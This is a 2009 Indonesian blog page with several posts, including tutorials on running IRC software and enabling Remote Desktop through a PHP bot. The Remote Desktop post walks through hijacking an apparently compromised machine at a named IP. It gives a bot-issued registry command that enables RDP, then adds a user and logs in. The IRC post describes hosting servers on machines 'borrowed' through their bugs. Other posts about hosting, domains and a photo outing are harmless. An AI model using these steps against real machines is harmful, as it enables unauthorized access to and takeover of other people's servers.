Update Videoku Yang TerBaru

Posted in belajar, Cuap-Cuap, Internet, Irc on May 8, 2009 by Furkan

Akhirnya 2 Videoku jadi juga, walaupun berkapasitas besar, karena tidak ada edit, setelah di buat kemudian langsung di convert langsung ke swf dan di upload di sitesled.

Video ini merupakan kelanjutan dari video-video sebelumnya tentang Remote Desktop dan UnrealIRCD, yang sebelumnya saya sendiri belajar hanya dengan UnrealIRCD alias tidak memiliki servis dan baru-baru ini dapat ditambahkan services berkat teman-teman di Dalnet yang selalu mengajarkan dan membimbing agar bisa menjalankan services.

Video Mengaktifkan terminal server dan install unrealircd dan servisnya memiliki banyak kendala, disamping hilangnya flashdisk yang mengakibatkan semua data-data hilang, beserta remote desktop untuk bahan pembuatan video, tapi syukur dengan adanya sebuah botscan dapat melakukan scanning RFI sehingga mendapatkan sebuah tempat untuk melakukan percobaan.

mengaktifkan Remote Desktop pada windows khususnya Windows 2003 dan Windows XP tergantung dari server masing-masing, kadang pada server masing-masing tidak diberikan akses langsung ke server dan tidak diizinkan menjalankan beberapa perintah, sehingga mengantifkan Remote Desktop tidak bisa dilakukan. selain itu port 3389 yang merupakan port remote desktop tidak dapat dibuka alias di blokir, sehingga bagaimanapun tidak dapat di buka, kecuali akses administrators itu sendiri.

pada install unrealircd beserta servisnya beberapa bulan lalu telah saya coba untuk menjalankannya, baik pada localhost maupun pada public, pada localhost aman-aman saja, dan pada public tergantung dari port yang kita jalankan, maklum saya mencoba menjalankan unrealircd bukan pada server saya sendiri, melainkan meminjam dari server-server yang memili kesalahan/bug.

Install UnrealIRCD Dan Anope Services Di Windows

Posted in belajar, Cuap-Cuap, Internet, Irc on May 8, 2009 by Furkan

Install UnrealIRCD Dan Anope Services Di Windows

URL:

http://anakdompu.sitesled.com/InstallUnrelIRCDdanServis.html
Assalamualaikum Wr.. Wb…

Ktemu lagi nih dengan Saya Shinchi a.k.a Furkan

Shinchi Memang Cakep Walau Jelek Tetap Bilang Cakep La hehehe

setelah membuat video yang mengaktifkan rdp lewat phpbot kita yang akan
kita lakukan adalah menginstall unrealircd + services..

adapun alat serta bahan😀
hehhee
mau masak neh ceritanyaaa….

1. RDP ato server
2. unrealircd + anope + microsoft Visual C++

dan semua itu bisa di download di:

Wget
http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip

UnrealIrcd
http://www.vulnscan.org/unr/Unreal3.2.8.1-SSL.exe

anope
http://nchc.dl.sourceforge.net/sourceforge/anope/anope-1.8.0.exe

Microsoft Visual C++ 2005 SP1 Redistributable Package (x86)
http://download.microsoft.com/download/e/1/c/e1c773de-73ba-494a-a5ba-f24906ecf088/vcredist_x86.exe

okeh
mari kita buka mstsc

run => mstsc

dari mirc tinggal ketik
/run mstsc

langsung aja kita donwload yahh

untuk config unrealircd kita gunakan 3 file yaitu
unrealircd.conf
oper.conf
connect.conf

unrealircd.conf itu adalah file confignya
oper adalah file untuk oper-oper IRCop gituu
terus file connect itu untuk link ke ircd lain :d atau untuk tambahin server

anope sedang di download..
tinggal Microsoft Visual C++ 2005 SP1 Redistributable Package (x86)

kalau udah terdownload semua tinggal kita jalankan😀

install visual c++

kemudian masukkan config unrealircd
mari kita sedot lagiii
pindah ke dir dimana unrealircd di install

lanjutt lagii….

services.conf itu untuk anope servisna ntar😀
kalau udah masuk semua confignya sekarang jalankan unrealnya😀

yuuukkkkkkk

seeepppp
unrealircd udah jalan…
sekarang kita pastikan udah jalan atau tidakk
mari gunakan mirc….

nahh akhirnyaa jalan juga khann😀
hehhee
mari kita login oper

udah jalan khann…

untuk mengetahui opernya lihat aja di oper.conf sekarang kita install servernya Okehhh😀

skarang tinggal masukkan services.conf atau sedott lagii laaa

sekarang kita config servernyaa biar servis dan unrealircd jadi satu alias singkron.

buka connect.conf la😀

okeh udah kita setting
selanjutnya mari kita execute😀

-Irc.AnakDompu.Co.Cc- *** LocOps — Link denied for services.AnakDompu.Co.Cc(unknown@127.0.0.1) (Server is in link block but IP/host didn’t match) [@127.0.0.1.3239]

ipnya telah di block
mari kita cek2 lagii dehh

unrealircd.conf Rehashing

-Irc.AnakDompu.Co.Cc- *** Notice — Loading IRCd configuration ..

-Irc.AnakDompu.Co.Cc- *** Notice — Configuration loaded without any problems ..

-Irc.AnakDompu.Co.Cc- *** Notice — (link) Link Irc.AnakDompu.Co.Cc -> services.AnakDompu.Co.Cc[@202.143.129.201.3244] established

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for OperServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for NickServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for ChanServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for HostServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for MemoServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for BotServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for HelpServ on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Permanent Global Q:line added for Global on Fri May 08 00:57:45 2009 GMT (from services.AnakDompu.Co.Cc: Reserved for services)

-Irc.AnakDompu.Co.Cc- *** Notice — Link services.AnakDompu.Co.Cc -> Irc.AnakDompu.Co.Cc is now synced [secs: 0 recv: 1.589 sent: 1.851]

Akhirrrnyaaa services jalan jugaa…. tidak percaya mari kita lihat…

nick Shinchi adalah servicesroot jadi harus di register duluan😀

nah udah khan

sampai disini dulu yahh…
sampai ketemu dengan Video selanjutnya..

Wasalamualaikum Wr.. Wb…

Install UnrealIRCD And Anope Services in Windows

[Video] Aktifkan Terminal Server (Remote Desktop) Dengan PhpBot

Posted in belajar, Internet, Irc on May 8, 2009 by Furkan

Aktifkan Terminal Server (Remote Desktop) Dengan PhpBot

URL:

http://anakdompu.sitesled.com/aktifkanterminalserver.html
Assalamualaikum Wr.. Wb…

Ketemu lagi dengan Saya Shinchi

sekarang kita mencoba mengaktifkan Remote Desktop Connection lewat botphp sebelumnya
pernah mengaktifkan rdp lewat spybot dan sekarang kita mencoba dengan
botphp

langsung saja yahh..

untuk membuka remote desktop dapat di buka lewat cmd ataupun mirc

mstsc

pertama cek hostname
kemudian cek ip target D:

163.20.68.54

ip sudah didapatkan dan sekarang coba konek dengan mstsc

The client could not connect to the remote computer.

nah artinya port rdp tidak bisa jalan atau kebuka.

tinggal coba kita buka dengan botnya

.sexec @reg add “\\hollings-ad7edf\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

nilai 0 berarti Enable => ON
nilai 1 berarti Disable => OFF

untuk aktifkan lewat spybot ada disini tulisanx:

http://furkan.dompu.info/2008/10/aktifkan-terminal-server-dari-spybot.html

sekarang kita cek targetnya udah kebuka atau belum remote desktopnya

hehehe
mantafff
udah bisa kebukaa
sekarang kita add user untuk login ke komputer😀

udah beress sekarang tinggal login
kalau tidak mengerti perintah itu coba buka2 lagi deh tulisan sebelumnya :

coba aja lihat di blog saia😀

mari kita coba konek😀

Akhirnyaa Masukk Juga Coyy😀

selamatttt
selanjutnya terserahh kita deh mau ngapain…

tapi di jaga yahh jangan suka ngerusakkk😀

ngintip dikit ach…😀
hehehe

hehehe masih perawan servernya😀

udah dulu yahh…
sampai ketemu di video selanjutnya😀

Enable Terminal Server from PhpBot

hosting hilang redirect ke by.ru

Posted in Cuap-Cuap, Internet, Kenangan on May 2, 2009 by Furkan

Beberapa tahun dengan anakdompu.by.ru kini tinggal kenangan, semua file-file didalamnya lenyap dan hilang entah kemana, video-video tutorial yang di masukkan didalamnya kini hilang sudah.

tempat hosting yang sekaligus tempat menyimpan berbagai macam file serta curahan hati kini hilang dan lenyap sudah.

setiap kali menuliskan http://anakdompu.by.ru yang muncul hanyalah halaman kosong dan langsung di redirect ke alamat http://by.ru/info/?where

Hilangnya anakdompu.by.ru berakibat fatal terhadap blog furkan.dompu.info yang sebelumnya adalah furkan-dompu.blogspot.com yang di karenakan video tutorial di iframe ke anakdompu.by.ru dan setiap pencarian di blog furkan.dompu.info yang mengarahkan pada label yang berhubungan internet, learning, botnet, IRC, newbie, berbagi cerita beberapa detik setelah halaman yang di iframe ke anakdompu.by.ru akan mengarah ke http://by.ru/info/?where dari pada berlama-lama dan sebaiknya di perbaiki langsung, sehingga yang mengunjungi blog ini tidak merasa heran ataupun binggung.

Entah Kenapa furkan.dompu.info meredirect ke by.ru dan setelah di cek pada source codenya terdata iframe src=

tb01 bot – Vuln Tracking Engine

Posted in belajar, Bot, Cuap-Cuap, Internet, Irc on April 29, 2009 by Furkan

tb01bot

Udah beberapa minggu tidak berkunjung di server irc sebelah, dan karena seringnya di Dalnet kejenuhanpun datang kembali, dan akhirnya melucur ke Indoirc dan sekalian mengecek Irc server list indonesia gitu.

IndoIRC merupakan salah satu IRC server Indonesia selain Allnetwork, Mildnet serta Allindoserv. Banyak sekali bot-bot yang masuk pada server IndoIRC, dikarenakan orang-orang disana melakukan scanning terhadap situs-situs di internet yang memiliki kelemahan sehingga bot-bot yang bertebaran masuk kedalam IRC dan digunakan untuk menjalankan bot RFI Scanner dan juga digunakan untuk DDOS.

radnetid

Melihat Dan mengamati sejenak apa saja yang dilakukan oleh orang-orang di channel semaking lama semakin banyak bot-bot yang masuk, dan salah satunya adalah dari sby.rad.net.id dan akhirnya malam ini berani juga saya melapor, walaupun agak lama😀

Tambah lama bot-bot semakin canggih saja, dengan ditambahkannya beberapa mesin pencari di bot php, yang biasanya hanya untuk menjalankan pintu belakang ataupun untuk ddos, tapi kini semakin komplek saja, dan dapat melakukan pencarian untuk kelemahan serbuah situs.

Domainku Yang baru

Posted in Cuap-Cuap, Internet on April 28, 2009 by Furkan

Setelah Beberapa Hari Yang Lalu Tepatnya beberapa minggu setelah membeli domain dompu.info dan di bayar dengan paypal dari pembayaran pertama review.

blog dengan alamat furkan-dompu.blogspot.com  di ganti dengan menambahkan subdomain furkan dengan domain dompu.info sehingga menjadi furkan.dompu.info dan 3 hari kemudian ter-index oleh google pada halaman pertama dengan keyword furkan dompu😛

Furkan.Dompu.Info

Hanya Sekedar Ambil Foto

Posted in Cuap-Cuap, Kenangan on April 16, 2009 by Furkan

nah Sebelum Cerita ini Neh Mending Lihat Dulu Kumpul-kumpul Di jalan udayana dan Oleh-oleh dari mataram

Cerita-cerita sambil lirik kesebelah dan iseng-iseng foto-foto deh ma cewek sebelah.

gini nih ceritanya:

Sekalian Belajar Foto-Foto Dan Mencari Objek Untuk Di foto, malah Temen-temen Tawarin Kan tun ada cewek pergi minta fotonya sana, sekalian nomer hpnya.
Langsung Deh Menuju TKP.

Furkan: Permisi Mba, Boleh Nggak Foto-Foto?
Putih: Untuk Apaan yah?
Furkan: Untuk Kenang-kenangan Mbak, Sekalian Kenalan Gitu.
Hijau: Ohhh…
Furkan: Boleh kan mbak?

Banyak Banget Deh ngobrolnya sampai Mbak-mbaknya mau di foto, dan akhirnya merekapun mau di foto.

Alasan pertama sih karena kita lagi reunian dan ingin foto-foto, yang kedua fotonya ingin saya posting di blog.
Furkan: Bisa dimulaikan fotonya!!, Senyum Dong mbak!! 1 2 3!!

Dan Akhirnya Dapat Tuh Foto berdua tapi sebelum Ambil Fotonya Terlebih Dahulu Kenalan Dulu donk:

sambil memberikan tangan dan berjabat tangan sembari mengucapkan:

Furkan : Saya Furkan, kalau mbaknya siapa?
Hijau: Nana.
Sambil berkenalan dengan yang berbaju putih.
Furkan: Saya Furkan, mbaknya?
Putih: Emi

Bla…Bla…Bla.. .

Dan lanjuttt foto sendiri-sendiri yahh…

Dimulai Dari yang hijau dulu baru kemudian yang putih

sebenarnya cih udah di bilangin senyum donk, tapi mbaknya nggak tersenyum, ya walaupun tidak senyum tapi tetap manis ko hehehe.

nah kali ini berdua nih, karena dudukannya saling berhadapan jadi saya minta duduknya berdampingan biar lebih bagus di foto.

Mbak yang baju putih tangannya di atas sedotan sambil memegang jusnya, dan biar kelihatan bagus saya bilang dech:
“mbak coba turunin tangannya biar kelihatan bagus”
akhirnya diturunin deh tuh tangan, dan sambil ucapin “senyum donk mbak” dan click dapat deh tuh foto hehehee.

dan sebelum kembali ke tempat duduk masing-masing terjadi percakapan kecil deh:

Furkan: mbak fotonya boleh saya posting di internetkan untuk di masukkan di blog, boleh khan?
putih: boleh-boleh aja sih, asal jangan di salah gunakan aja.
Furkan: oke deh mba, kan saya minta ijin dulu sama yang punya foto. ntar saya posting di http://furkan-dompu.blogspot.com

sambil berbasi basi dan sekalian minta nomer hp sekalin tempat kuliahnya..

udah deh sampai segitu  cape juga neh ketiknya..
lumayan dah nih untuk oleh-oleh

tulisan ini juga udah saia posting di blog saia di blogspot